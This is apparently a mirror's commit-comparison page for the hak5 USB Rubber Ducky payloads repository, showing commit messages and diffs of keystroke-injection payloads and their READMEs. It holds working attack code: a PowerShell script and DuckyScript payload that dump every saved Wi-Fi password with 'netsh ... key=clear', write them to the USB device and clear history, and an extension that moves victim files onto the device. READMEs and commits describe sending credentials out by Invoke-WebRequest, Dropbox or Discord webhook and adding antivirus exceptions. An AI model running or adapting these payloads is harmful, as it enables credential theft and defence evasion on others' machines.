hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:e13e3a3bd342c621b28ddb15afe76110de638ad3
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs
...
compare: hak5:a6bc17148dc6a03c04c022755d594e1445620444
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs

86 Commits
e13e3a3bd3 ... a6bc17148d

Author SHA1 Message Date
adam-top-g a6bc17148d
Merge 58f55507f0 into fd272a60f4 2024-09-24 20:30:44 +09:30
Peaks fd272a60f4
Merge pull request #480 from aleff-github/patch-93 
Replace Links In GithubDesktop
 2024-09-20 14:03:29 -04:00
Aleff 9f1222ba05
Update payload.txt 2024-09-19 19:55:47 +02:00
Peaks 02641718a0
Merge pull request #478 from aleff-github/patch-91 
Install Any Arbitrary VSCode Extension
 2024-09-17 18:06:23 -04:00
Aleff 2c84ff499c
Update payload.txt 2024-09-17 10:23:40 +02:00
Peaks 7883e2bc50
Merge pull request #479 from aleff-github/patch-92 
Install Official VSCode Extension
 2024-09-17 03:11:42 -04:00
Alessandro Greco b1fae99ade Update README.md 2024-09-16 14:54:17 +02:00
Alessandro Greco 52c42dfc10 Merge branch 'patch-93' of https://github.com/aleff-github/usbrubberducky-payloads into patch-93 2024-09-16 14:43:34 +02:00
Alessandro Greco 6e3f5924c0 Update payload.txt 2024-09-16 14:43:00 +02:00
Aleff 71d5eaf378
Bug in renderer regex 
the link api.github.com needs to be correct
 2024-09-16 14:42:11 +02:00
Alessandro Greco 1fa6cea874 [+] Replace Links In GithubDesktop 
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user.
 2024-09-16 14:30:19 +02:00
Aleff e5254c68a2
Update README.md 
[+] Credits
 2024-09-05 13:15:56 +02:00
Alessandro Greco d350174b13 Install Official VSCode Extension 
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems.

The extension to be installed is specified via the `publisher.extensionName` parameter.

The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
 2024-09-05 13:11:53 +02:00
Alessandro Greco 284195f4cd Install Any Arbitrary VSCode Extension 
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:

1. Removes any pre-existing version of the extension (if applicable).
2. Downloads a ZIP archive of a VSCode extension.
3. Extracts the extension to the correct VSCode extensions folder.

The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
 2024-09-05 09:52:58 +02:00
Peaks 45a1dc0f01
Merge pull request #345 from aleff-github/patch-62 
Follow someone on Instagram
 2024-09-04 12:41:08 -04:00
Peaks 0bebb446fd
Merge pull request #476 from aleff-github/patch-88 
[+] PASSIVE_WINDOWS_DETECT
 2024-09-02 12:22:54 -04:00
Aleff 7749aa95c1
DOWNARROW Error 2024-09-02 09:50:42 +02:00
Peaks 9f5f323a0d
Merge pull request #349 from aleff-github/patch-66 
Update READMEs Aleff Credits
 2024-09-01 20:02:13 -04:00
Peaks b697112f2b
Merge pull request #355 from aleff-github/patch-69 
Play A Song On An iPhone
 2024-09-01 18:03:28 -04:00
Peaks d4e64b9974
Merge pull request #353 from aleff-github/patch-67 
Change Github Profile Settings
 2024-09-01 18:01:34 -04:00
Peaks 29ac81bb31
Merge pull request #356 from aleff-github/patch-70 
Call Someone On An iPhone
 2024-08-30 08:44:45 -04:00
Peaks 4e44f6ef84
Merge pull request #358 from aleff-github/patch-71 
Edit A Reminder On An iPhone
 2024-08-30 08:43:38 -04:00
Peaks 42a455a7a2
Merge pull request #359 from aleff-github/patch-72 
Delete A Reminder On An iPhone
 2024-08-30 08:42:50 -04:00
Alessandro Greco 2ed20404a3 moved to execution 2024-08-30 11:14:54 +02:00
Alessandro Greco 777d28a254 Updated 2024-08-30 11:11:41 +02:00
Alessandro Greco af77fdb130 Removed duplicate 2024-08-30 11:08:48 +02:00
Alessandro Greco 6331122f51 Update script 2024-08-30 11:06:48 +02:00
Alessandro Greco c11425f7fd Update script 2024-08-30 11:04:59 +02:00
Alessandro Greco 60eb65fbbc Update 2024-08-30 11:00:03 +02:00
Aleff 40da51da72
[+] PASSIVE_WINDOWS_DETECT 2024-08-30 10:33:40 +02:00
Peaks be52f4d1c9
Merge pull request #475 from yeetboy0330/master 
Add Local_WLAN_Borrower payload
 2024-08-29 03:48:05 -04:00
Yeet 64a7666c12
Update payload.txt 2024-08-29 10:07:57 +10:00
Yeet 0e9ea1358b
Update README.md 
Made the README.md worth reading
 2024-08-29 10:07:34 +10:00
Peaks ad08ba6e36
Merge pull request #474 from PlumpyTurkey/master 
Fix “Windows Product Key Grabber” payload
 2024-08-23 05:27:29 -04:00
Yeet a1a7310d61
Added 1.ps1 file 
this file borrows and stores the wifi passwords.
 2024-08-23 10:11:24 +10:00
Yeet 04b71efc9b
Create README.md 
added cool readme.md to describe my payload
 2024-08-23 10:10:35 +10:00
Yeet ca6490cc9a
Create payload.txt 2024-08-23 10:06:44 +10:00
Julien M e4a7876a00 Update version badge 2024-08-22 22:17:24 +02:00
Julien M f7d2f37def Remove duplicate function 2024-08-22 22:16:56 +02:00
Peaks d02b817225
Merge pull request #400 from aleff-github/patch-80 
Exfiltrate Windows Product Key
 2024-08-21 18:42:57 -04:00
Alessandro Greco 828c60acca Adapted with DUCKY_DRIVE_LABEL 2024-08-21 07:41:47 +02:00
Peaks 404640f615
Merge pull request #427 from aleff-github/patch-83 
Extension: SAVE FILES IN RUBBER DUCKY STORAGE
 2024-08-20 17:04:28 -04:00
Alessandro Greco 9e6b405745 from - to _ 2024-08-20 12:33:10 +02:00
Alessandro Greco c895160753 from - to _ 2024-08-20 12:27:36 +02:00
Aleff 2e892e4b0e Aporting hak5peaks tips 
[#] Extension renamed to `_` instead of `-` and only all caps
[#] Windows to all caps
[+] Added #DRIVER-LABEL
[#] Unordered spacing removed
 2024-06-01 10:26:10 +02:00
adam-top-g 58f55507f0
Update all-info-to-dropbox 2024-05-18 13:15:05 +02:00
adam-top-g cfa7fb574c
Create all-info-to-dropbox 2024-05-18 13:13:25 +02:00
Aleff 35fc314e15
Update payload.txt 2024-01-14 12:56:38 +01:00
Aleff 203bf15391
Update README.md 2024-01-14 12:56:23 +01:00
Aleff 76b023efa3
Update README.md 2024-01-14 12:55:18 +01:00
Aleff dc5c20e7ac Update README.md 2024-01-14 11:51:58 +01:00
Aleff bf9ec4cfc0 Merge remote-tracking branch 'upstream/master' into patch-66 2024-01-14 11:43:28 +01:00
Aleff 8d3adb90ad space removed 2024-01-14 11:27:35 +01:00
Aleff 7652db1704 Extension: SAVE FILES IN RUBBER DUCKY STORAGE 
Creation of the extension "SAVE FILES IN RUBBER DUCKY STORAGE" based on the old proposal "Send Files Through Dropbox - Windows"[1]

[1] https://github.com/hak5/usbrubberducky-payloads/pull/399
 2024-01-04 17:04:18 +01:00
Aleff e595d71ac3 USB Rubber Ducky Storage 
The method of data storage via USB Rubber Ducky storage has been added.
 2024-01-04 16:31:43 +01:00
aleff-github 0bd6624877 README 2023-11-03 12:45:02 +01:00
Aleff 40b33c703e
Exfiltrate Windows Product Key 
Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook.
 2023-11-03 12:44:11 +01:00
aleff-github 81077db152 moved to execution 2023-10-19 08:57:45 +02:00
aleff-github 22a5428515 optimization 2023-10-19 08:51:07 +02:00
aleff-github 3b2fee98fc Moved to new category 2023-10-18 11:32:54 +02:00
aleff-github a9fb6e98dd moved to execution 2023-10-18 11:28:05 +02:00
aleff-github da5acc3da0 renamed properly 2023-10-18 11:03:14 +02:00
aleff-github 899ad2c484 Moved to execution 2023-10-18 10:22:23 +02:00
aleff-github bf1cf5957b Conceptual errors 2023-10-18 09:25:55 +02:00
aleff-github 088512fbba renamed properly 2023-10-18 08:56:32 +02:00
Aleff badf3a7705
Update README.md 2023-07-06 08:38:53 +02:00
aleff-github b728f4d525 Create README.md 2023-07-01 09:27:14 +02:00
Aleff c19eca930e
Delete A Reminder With An iPhone 2023-07-01 09:26:30 +02:00
aleff-github 8cd2d9d8b5 Create README.md 2023-07-01 09:23:19 +02:00
Aleff 826ca00433
Edit A Reminder With An iPhone 2023-07-01 09:22:43 +02:00
aleff-github 868c86ea30 Create README.md 2023-06-29 11:51:23 +02:00
Aleff 670d85768a
Call Someone With An iPhone 2023-06-29 11:50:44 +02:00
aleff-github ba821b39d2 Create README.md 2023-06-29 11:41:41 +02:00
Aleff 7adf46b49d
Play A Song With An iPhone 2023-06-29 11:40:13 +02:00
aleff-github 1bd6172bb7 Update README.md 2023-06-27 09:43:10 +02:00
aleff-github 3ebbdd8851 PayloadStudio >= 1.3.1 2023-06-27 08:29:39 +02:00
aleff-github c1a67472f5 Create README.md 2023-06-26 17:04:49 +02:00
Aleff eb254e0d30
Change Github Profile Settings 2023-06-26 17:03:41 +02:00
aleff-github ec0979eaf6 Update 2023-06-25 00:40:23 +02:00
aleff-github 838d032b5b Update 2023-06-16 23:58:45 +02:00
aleff-github b2a64152dc Update completed 2023-06-16 23:57:08 +02:00
Aleff 2f349d93ab
Update READMEs Aleff Credits 
I decided I wanted to add a credits section to the README files of the previously uploaded payloads so I will use a single pull request to do this
 2023-06-16 23:45:18 +02:00
Aleff 07b0b4d7b1
Update README.md 2023-06-16 23:28:35 +02:00
aleff-github 2d8482cb36 Update payload.txt 2023-06-13 09:33:58 +02:00
aleff-github 9aa67fa102 Create README.md 2023-06-13 09:25:24 +02:00
Aleff b4859f9ec6
Follow someone on Instagram 2023-06-13 09:24:28 +02:00
77 changed files with 2621 additions and 149 deletions
Show Stats Expand all files Collapse all files

103
payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/README.md Normal file
View File

@ -0,0 +1,103 @@
# Save Files In Rubber Ducky Storage - Windows
This extension can be used to save one or more files through the USB Rubber Ducky storage without having to copy and paste reused code every time, but standardizing a methodology that avoids errors.
```
How many files do you want to save?
|
|-- Single File
| |
| |-- Do you already know the full file path? (e.g., C:\Users\Aleff\Downloads\photo.png)
| | |
| | |-- Use the SINGLE_FILE version
| | | |
| | | |-- Set #FLAG_SINGLE_FILE to TRUE
| | | |-- Define the file path in #SINGLE_PATH
| | |
| |-- Don't know the full path but can obtain it at runtime through PowerShell?
| | |
| | |-- Use the $fileToSavePath variable
| | | |
| | | |-- Set #FLAG_SINGLE_FILE to TRUE
| | | |-- Obtain the file path through PowerShell and assign it to $fileToSavePath
|
|-- Multiple Files
| |
| |-- Set the #FLAG_SINGLE_FILE variable to FALSE
| | |
| | |-- Use an array of strings named $fileToSavePaths to collect the paths of all the files you want to use
```
## Target Environment
- **Target**: Windows PowerShell
## Usage
Insert this extension when you have one or more files that you want to save via USB Rubber Ducky storage.
## Configuration
Before using the extension, you need to configure it by setting certain variables in the DuckyScript payload. Here are the configuration options:
### Driver Label
This extension utilizes the 'Get-Volume' command to scan the available volumes on the computer where the command is executed, aiming to detect our USB Rubber Ducky device. Upon detection, the device is selected to serve as a reference, allowing us to perform data saving operations. By default, USB Rubber Duckys are identified by the label 'DUCK'. However, this label can be altered, particularly if we want to keep the operation discreet. If the default label has been changed, it will be necessary to update the #DRIVER_LABEL variable with the correct label.
### Single File or Multiple Files
You can choose to send a single file or multiple files. Configure the extension accordingly.
#### Single File Configuration
- **Variable**: #FLAG_SINGLE_FILE
- **Type**: Boolean (TRUE or FALSE)
- **Description**: Set #FLAG_SINGLE_FILE to TRUE if you want to save just one file. In this case, you will need to specify the file path within the #SINGLE_PATH variable. Alternatively, you can acquire the file path at runtime via PowerShell and store it in the $fileToSavePath variable.
Example in DuckyScript:
```DuckyScript
DEFINE #FLAG_SINGLE_FILE TRUE
DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
```
Example in PowerShell before using the extension:
```powershell
$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
```
#### Multiple Files Configuration
- **Variable**: #FLAG_SINGLE_FILE
- **Type**: Boolean (TRUE or FALSE)
- **Description**: Set #FLAG_SINGLE_FILE to FALSE if you want to save multiple files. In this case, in PowerShell, you will have to create the variable $fileToSavePaths, which is an array of strings containing the list of paths related to the files you want to export.
Example in PowerShell before using the extension:
```powershell
$fileToSavePaths = @(
"C:\Users\Aleff\Downloads\photo.png",
"C:\Users\Aleff\Downloads\document.pdf",
"C:\Users\Aleff\Downloads\song.mp3"
)
```
**Tips for Working with Arrays in PowerShell:**
- How to create an array:
```powershell
$fileToSavePaths = @()
```
- How to add an element to the array:
```powershell
$fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
```
- How to view the array:
```powershell
$fileToSavePaths
```
That's it! You can now use this extension with the appropriate configuration to save files via the USB Rubber Ducky storage using the same USB Rubber Ducky.

68
payloads/extensions/community/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE/SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS.txt Normal file
View File

@ -0,0 +1,68 @@
EXTENSION SAVE_FILES_IN_RUBBER_DUCKY_STORAGE_WINDOWS
REM VERSION 1.0
REM AUTHOR: Aleff
REM_BLOCK Documentation
This extension is used to save one or more files through the USB Rubber Ducky storage.
TARGET:
Windows 10/11
USAGE:
Insert this extension when you have one or more files that you want to save in your USB Rubber Ducky.
CONFIGURATION:
Set #DRIVER_LABEL variable with the correct Label of your USB Rubber Ducky considering that the default value is 'DUCK'.
Set #FLAG_SINGLE_FILE with TRUE if you want to save just one file.
In this case you will need to specify the file path within the #SINGLE_PATH variable OR, in case the exact path to the file you can only acquire it at runtime and so via the powershell, use in the powershell the $fileToSavePath variable to capture this path.
i.e. in DuckyScript EXTENSION
DEFINE #SINGLE_PATH C:\Users\Aleff\Downloads\photo.png
i.e. in PowerShell before extension
$fileToSavePath = "C:\Users\Aleff\Downloads\photo.png"
Set #FLAG_SINGLE_FILE FALSE if you want to send multiple files.
In this case in the PowerShell you will have to create the variable $fileToSavePaths, which is an array of strings that should contain the list of paths related to the files you want to save.
i.e. in PowerShell before extension:
$fileToSavePaths = @(
"C:\Users\Aleff\Downloads\photo.png",
"C:\Users\Aleff\Downloads\document.pdf",
"C:\Users\Aleff\Downloads\song.mp3"
)
Some tips:
How to create an Array?
> $fileToSavePaths = @()
How to add an element?
> $fileToSavePaths += "C:\Users\Aleff\Downloads\photo.png"
How to see the array?
> $fileToSavePaths
END_REM
REM Settings
DEFINE #DRIVER_LABEL DUCK
DEFINE #FLAG_SINGLE_FILE FALSE
DEFINE #SINGLE_PATH 0
REM Extension Code
FUNCTION SAVE_SINGLE_FILE()
IF ( #SINGLE_PATH != 0 ) THEN
STRINGLN mv #SINGLE_PATH >> ${m}:\
ELSE IF ( #SINGLE_PATH == 0 ) THEN
STRINGLN mv ${fileToSavePath} >> ${m}:\
END_IF
END_FUNCTION
FUNCTION SAVE_MULTIPLE_FILES()
STRINGLN
foreach ($fileToSavePath in $fileToSavePaths) {
mv ${fileToSavePath} >> ${m}:\
}
END_STRINGLN
END_FUNCTION
STRINGLN $m=(Get-Volume -FileSystemLabel '#DRIVER_LABEL').DriveLetter;
IF_DEFINED_TRUE #FLAG_SINGLE_FILE
SAVE_SINGLE_FILE()
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #FLAG_SINGLE_FILE
SAVE_MULTIPLE_FILES()
END_IF_DEFINED
END_EXTENSION

26
payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md
View File

@ -19,11 +19,29 @@ Opens a shell, get the WiFi names, get the passwords using nmcli, send the resul
* Dropbox Token
* Permissions
### Executing program
* Plug in your device
### Settings
* Set the Dropbox token
* Set the sudo password
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

49
payloads/library/credentials/Local_WLAN_Borrower/1.ps1 Normal file
View File

@ -0,0 +1,49 @@
# Define the volume label you're looking for
$targetLabel = "DUCKY"
# Find the drive letter of the USB drive with the specified label
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
if ($volume) {
$driveLetter = $volume.DriveLetter + ":\"
$usbPath = "$driveLetter$env:username.txt"
$baseDestinationDir = $driveLetter
Write-Output "Drive letter found: $driveLetter"
} else {
Write-Error "Drive with label '$targetLabel' not found."
exit
}
# Initialize an array to store all Wi-Fi profiles and their passwords
$wifiData = @()
# Get all Wi-Fi profiles
$profiles = netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+'
foreach ($profile in $profiles) {
$wlan = $profile.Matches.Value.Trim()
# Get the password for the current Wi-Fi profile
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
$password = if ($passw) { $passw.Matches.Value.Trim() } else { "No Password Found" }
# Create a custom object with the profile and password information
$wifiData += [PSCustomObject]@{
Username = $env:username
Profile = $wlan
Password = $password
}
}
# Convert the array of Wi-Fi data to JSON
$jsonBody = $wifiData | ConvertTo-Json -Depth 3
# Save the JSON data to a file on the USB drive
$jsonBody | Out-File -FilePath $usbPath -Encoding UTF8
# Clear the PowerShell command history
Clear-History
exit

7
payloads/library/credentials/Local_WLAN_Borrower/README.md Normal file
View File

@ -0,0 +1,7 @@
### Local_WLAN_Borrower
This script borrows the wifi passwords on the target system and puts them into a .txt file on the ducky.
# Setup
Firstly, download and place the _1.ps1_ script onto the root of your ducky. Then, you will need to edit the inject.txt file accordingly:
On line 57, change "DUCKY" to the label of your USB. On line 59, change 1.ps1 to the name of the PS1 script on your ducky.
Inside of the PS1 script, you will need to replace _DUCKY_ on line 2 with the label of your USB.

79
payloads/library/credentials/Local_WLAN_Borrower/payload.txt Normal file
View File

@ -0,0 +1,79 @@
REM Title: Local_WLAN_Borrower
REM Description: Borrows wifi passwords and saves them on the DUCKY
REM Author: YEETBOY0330
REM Props: Zero_Sploit(DUCKY-WIFI-GRABBER) + Hak5 Team
REM Version: 1.0
REM Category: Creds
REM Target: Windows 10 & 11
REM Attackmodes: HID, STORAGE
ATTACKMODE HID STORAGE
DEFAULTDELAY 20
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM change this to your drive label
DEFINE #DRIVE_LABEL DUCKY
REM change this to the name of your PS1 script
DEFINE #PS1_FILE_NAME 1.ps1
IF ($_OS == WINDOWS) THEN
REM Initial Delay
DELAY 1000
REM Opens powershell with script execution enabled
GUI r
DELAY 700
STRINGLN powershell -ExecutionPolicy Bypass
DELAY 4000
REM Gets usb drive letter of #DRIVE_LABEL
STRINGLN_POWERSHELL
$targetLabel = "#DRIVE_LABEL"
$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }
$driveLetter = $volume.DriveLetter + ":"
cd $driveletter
END_STRINGLN
REM Runs powershell script
STRINGLN .\#PS1_FILE_NAME
END_IF

26
payloads/library/credentials/WLAN-Windows-Passwords/README.md
View File

@ -1,8 +1,8 @@
# WLAN Windows Password - BADUSB ✅
# WLAN Windows Password
A script used to stole target WLAN Passwords.
**Category**: WLAN, Credentials
**Category**: Credentials
## Description
@ -24,3 +24,25 @@ Then it cleans up traces of what you have done after.
* Plug in your device
* Invoke 2 netsh commands
* Invoke-WebRequest will be entered in the Run Box to send the content
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

24
payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md
View File

@ -2,7 +2,7 @@
This script can be used to put an arbitrary exception path in the Avast app.
**Category**: Execute
**Category**: Execution
## Description
@ -22,3 +22,25 @@ DEFINE FULL-PATH example/to/path
### Dependencies
* The target must have **Avast installed** and **configured** on the machine
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Add An Exception To Avast Antivirus |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ########################################################

56
payloads/library/execution/Call_Someone_On_An_iPhone/README.md Normal file
View File

@ -0,0 +1,56 @@
# Call Someone On An iPhone
This script can be used to call someone really fast using an iPhone, so iOS system.
**Category**: Execution
## Description
This script can be used to call someone really fast using an iPhone, so iOS system.
Open search bar, then open the Phone app (I used the italian name so 'Telefono'), then delete what is (hidden) stored and write the number, then call it.
## Dependencies
* The phone must be unlocked
## Test
- iPhone 14
- iOS 16.4.1
## Settings
- You need to change the name of the application according to the language you have on your phone.
```DuckyScript
[20] DEFINE #PHONE-APP-NAME
```
- You must set the phone number to be called
```DuckyScript
[22] DEFINE #NUMBER example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

32
payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt Normal file
View File

@ -0,0 +1,32 @@
REM ##############################################
REM # |
REM # Title : Call Someone On An iPhone |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : iPhone |
REM # |
REM ##############################################
REM Requirements:
REM - The phone must be unlocked
REM Tested on:
REM - iPhone 14
REM - iOS 16.4.1
REM You need to change the name of the application according to the language you have on your phone.
DEFINE #PHONE-APP-NAME example
REM You must set the phone number to be called
DEFINE #NUMBER example
GUI SPACE
DELAY 300
STRING #PHONE-APP-NAME
ENTER
DELAY 1000
BACKSPACE
STRING #NUMBER
DELAY 500
ENTER

24
payloads/library/execution/ChangeGitRemoteLink/README.md
View File

@ -2,7 +2,7 @@
This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
**Category**: Execute
**Category**: Execution
## Description
@ -55,3 +55,25 @@ To make it easier to use below you can find the various tested configurations, a
```DuckyScript
DEFINE #BRANCH example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

2
payloads/library/execution/ChangeGitRemoteLink/payload.txt
View File

@ -3,7 +3,7 @@ REM # |
REM # Title : Change Remote Git Link |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execute |
REM # Category : Execution |
REM # Target : Windows 10-11/Linux |
REM # |
REM ###########################################

22
payloads/library/execution/ChangeMacAddress_Linux/README.md
View File

@ -26,3 +26,25 @@ Opens a shell, get the network card name, set the new MAC address, erase traces.
* Set the sudo password
* Change as you want the new MAC address
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

26
payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md
View File

@ -17,11 +17,29 @@ Opens a shel, get the network card name, set the network configuration, erase tr
* Linux Permissions
### Executing program
* Plug in your device
### Settings
* Set the sudo password
* Change as you want the network configuration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

84
payloads/library/execution/Change_Github_Profile_Settings/README.md Normal file
View File

@ -0,0 +1,84 @@
# Change Github Profile Settings
This script can be used to edit Github account settings speeding up the editing process.
The script will run a shell and open the default browser in `https://github.com/settings/profile` and close the powershell. When the page is open go to the profile settings TABing many times.
**Category**: Execution
## Getting Started
### Dependencies
* Internet connection
* Logged in Github
* PayloadStudio >= 1.3.1
### Settings
- Here you should define the new name
```DuckyScript
[19] DEFINE #NAME example
```
- Here you should define the new Biography
```DuckyScript
[20] DEFINE #BIO example
```
- Here you should define the custom pronouns
```DuckyScript
[21] DEFINE #CUSTOM-PRONOUNS example
```
- Here you should define the new personal website url
```DuckyScript
[22] DEFINE #URL example
```
- Here you should define the new social network links
```DuckyScript
[23] DEFINE #SOCIAL-ACCOUNT-1 example
[24] DEFINE #SOCIAL-ACCOUNT-2 example
[25] DEFINE #SOCIAL-ACCOUNT-3 example
[26] DEFINE #SOCIAL-ACCOUNT-4 example
```
- Here you should define the new company
```DuckyScript
[27] DEFINE #COMPANY example
```
- Here you should define the new location
```DuckyScript
[28] DEFINE #LOCATION example
```
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

108
payloads/library/execution/Change_Github_Profile_Settings/payload.txt Normal file
View File

@ -0,0 +1,108 @@
REM_BLOCK
###################################################
# #
# Title : Change Github Profile Settings #
# Author : Aleff #
# Version : 1.0 #
# Category : Execution #
# Target : Windows 10/11 #
# #
###################################################
END_REM
REM Requirements:
REM - Internet connection
REM - Logged in Github
REM - PayloadStudio >= 1.3.1
REM You must set the new Profile Settings
DEFINE #NAME example
DEFINE #BIO example
DEFINE #CUSTOM-PRONOUNS example
DEFINE #URL example
DEFINE #SOCIAL-ACCOUNT-1 example
DEFINE #SOCIAL-ACCOUNT-2 example
DEFINE #SOCIAL-ACCOUNT-3 example
DEFINE #SOCIAL-ACCOUNT-4 example
DEFINE #COMPANY example
DEFINE #LOCATION example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
